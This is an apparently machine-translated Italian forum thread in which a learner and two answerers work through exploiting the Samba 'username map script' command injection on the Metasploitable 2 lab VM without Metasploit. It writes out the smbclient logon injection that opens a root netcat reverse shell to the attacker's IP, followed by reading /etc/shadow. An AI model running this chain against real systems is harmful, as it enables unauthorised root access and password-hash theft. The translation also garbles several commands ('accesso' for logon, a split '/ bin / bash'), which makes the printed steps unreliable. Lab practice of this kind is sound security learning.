Connessione inversa Metasploitable 2 - Kali Linux (Samba 3.x) senza Metasploit

5

Sto cercando di sfruttare Metasploitable 2 senza l'utilizzo di Metasploit, con l'obiettivo di imparare. In questo caso, mi sto concentrando su Samba 3.x (Port TCP 139, 445)

In questo link link vengono spiegati due metodi diversi per sfruttare questa macchina dopo che una scansione di nmap rivela le porte TCP 139 e 445 aperti, che eseguono Samba versione 3.x.

Il secondo metodo spiega che

This vulnerability takes advantage of the “username map script” functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.

Il mio problema si verifica quando si utilizza Metasploit, come in:

Ho finalmente trovato questo video link che evita Metasploit ma non funziona per me, dove segue (Kali = 192.168.200.1; Metasploitable2 = 192.168.200.130):

  1. Nella finestra Terminal 1, impostiamo netcat per ascoltare:

    netcat -nlvp 4444

  2. Nella finestra Terminal 2, controlliamo la condivisione

    smbclient -L //192.168.200.130

  3. Ci concentriamo sulla cartella tmp e connettiamo (Terminal 2):

    smbclient //192.168.200.130/tmp

  4. Infine, otteniamo "smb: >" dove il comando "logon" è usato per invertire la connessione a Kali, come

    smb: > accesso "/ = nc 192.168.200.1 4444 -e /bin/bash "

Questo ultimo punto non funziona per me con il seguente messaggio di errore "installazione della sessione fallita: NT_STATUS_NO_MEMORY".

È difficile per me trovare un buon manuale che spieghi il comando di "accesso". Ho provato a cambiare il modo in cui viene utilizzato netcat:

Al punto 1. Scrivo

smb: \> nc -nlvp 4444 -e /bin/bash

Al punto 4. Scrivo

smb: \> logon "/='nc 192.168.200.1 4444 -e /bin/bash'"

Stessi risultati. Lo stesso errore di messaggio.

Ho davvero provato a farlo da solo, ma non potevo. Ti sarei molto grato se potesse aiutarmi.

Grazie in anticipo !!

    
posta J.g. 08.01.2018 - 18:22
fonte

2 risposte

2

Sembra che tu stia configurando l'ascoltatore in smb (box vulnerabile).

smb: \> nc -nlvp 4444 -e /bin/bash

Quello che dovresti fare è impostare l'ascoltatore nella casella di attacco. utilizzando invece il seguente comando:

nc -nlvp 4444 

Finalmente da metasploitable2 hai impartito il comando:

logon "/='nc 'attack box ip' 4444 -e /bin/bash'"
    
risposta data 12.08.2018 - 23:08
fonte
1

Per coloro che hanno avuto lo stesso problema che ho avuto, rispondo come l'ho risolto, in base alle risposte precedenti, ea questo link Metasploitable 2 - Samba

I passi da seguire sono:

  1. Apriamo la finestra Terminal 1 e impostiamo netcat per ascoltare:

    netcat -nlvp 4444

  2. Apriamo la finestra Terminal 2, controlliamo le condivisioni della vittima:

    smbclient -L //192.168.200.130

  3. (Terminale 2) Ci concentriamo sulla cartella tmp e ci colleghiamo alla vittima:

    smbclient //192.168.200.130/tmp

  4. (Terminale 2) Infine, otteniamo smb: > dove viene utilizzato il comando logon per invertire la connessione a Kali, poiché

    smb: \ > accesso "/ = 'nc 192.168.200.1 4444 -e / bin / bash'"

Attenzione: non dimenticare il segno di spunta posteriore.

  1. (Terminale 1) Possiamo vedere la connessione stabilita e possiamo inserire i nostri comandi desiderati. Esempio:

    • id
    • hostname
    • uname -a
    • cat /etc/shadow

Quando viene richiesta la password, fai clic su entra (lasciando vuoto).

    
risposta data 14.08.2018 - 15:12
fonte

Leggi altre domande sui tag